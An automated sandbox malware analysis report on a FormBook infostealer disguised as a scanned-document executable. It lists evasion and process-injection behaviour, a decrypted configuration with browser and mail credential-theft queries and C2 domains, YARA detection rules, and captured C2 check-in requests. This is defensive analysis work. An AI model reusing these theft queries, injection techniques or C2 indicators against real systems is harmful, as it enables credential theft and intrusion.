Loading ...

Play interactive tourEdit tour

Analysis Report SKM_C36821010708320.exe

Overview

General Information

Sample Name:SKM_C36821010708320.exe
Analysis ID:339379
MD5:15d8096422d137c7388908bb2be61ec4
SHA1:e67d261ef38eb251fb97a466d83c95e75d286ebe
SHA256:fae57c2f185899220dff608004ab571822fc14cc02aa7e30b1cd5db7be4beea8
Tags:DHLexeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SKM_C36821010708320.exe (PID: 4740 cmdline: 'C:\Users\user\Desktop\SKM_C36821010708320.exe' MD5: 15D8096422D137C7388908BB2BE61EC4)
    • SKM_C36821010708320.exe (PID: 1928 cmdline: C:\Users\user\Desktop\SKM_C36821010708320.exe MD5: 15D8096422D137C7388908BB2BE61EC4)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 1736 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 4952 cmdline: /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x99bc", "KEY1_OFFSET 0x1e51d", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1e61b", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1d163", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1a749ebd", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "shuttergame.com", "beyondregions.com", "cuttingedgetinting.com", "riveraspanishfoods.com", "jfksn.com", "rtplay2020.com", "idahofallsobituaries.com", "qf432.com", "magandaconfections.com", "suremlak.com", "tuproductividadpersonal.com", "ziswmyxaw.icu", "howtolovemybody.com", "signpartnerpro.com", "conservative-forward.com", "bhscsh.com", "todowine.com", "garrettthermaldetector.com", "bunbook.com", "ehealthla.com", "mojacreations.com", "2kantxt.com", "aqustea.com", "sheilataman.com", "phymath.science", "sctuba.com", "columbusestatesseniorliving.com", "opyalliy.pro", "bestgiftforu.com", "cad-office-iserlohn.com", "gorgeus-girl-full-service.today", "easthaus-modern.com", "snoozefest.online", "service-xwcrvxsz.icu", "flavourcosmetics.com", "news247alert.com", "944ka.xyz", "bcheap3dmall.com", "crepkonnect.com", "purelili.com", "pushupbras.net", "ctsafaris.com", "sprinkleforever.com", "engagingsci.coach", "aihint.com", "icxrus.com", "7vitrines.com", "mrsgariepy.com", "bikewitha.pro", "adv-assist.com", "youlacka.com", "languagekickstart.com", "commonscentsbychloe.com", "o-tanemaki.com", "wlgdrs.com", "imbentaryo.com", "winwithrundlemall.com", "jumben.xyz", "24k88lotto.com", "bundlesofjoihair.com", "bukannyaterbuai31.com", "essentialeatscatering.com", "brasseriedufayard.com", "trumpvotr.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.ameeraglow.com/6bu2/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.SKM_C36821010708320.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.SKM_C36821010708320.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.SKM_C36821010708320.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        2.2.SKM_C36821010708320.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.SKM_C36821010708320.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x99bc", "KEY1_OFFSET 0x1e51d", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1e61b", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1d163", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1a749ebd", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: SKM_C36821010708320.exeReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: SKM_C36821010708320.exeJoe Sandbox ML: detected
          Source: 2.2.SKM_C36821010708320.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SKM_C36821010708320.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: SKM_C36821010708320.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.o-tanemaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.idahofallsobituaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.bhscsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.sheilataman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.ehealthla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.128.23.153 52.128.23.153
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: WIIUS WIIUS
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: Joe Sandbox ViewASN Name: DOSARRESTUS DOSARRESTUS
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.o-tanemaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.idahofallsobituaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.bhscsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.sheilataman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.ehealthla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.o-tanemaki.com
          Source: explorer.exe, 00000003.00000000.259665559.000000000F540000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
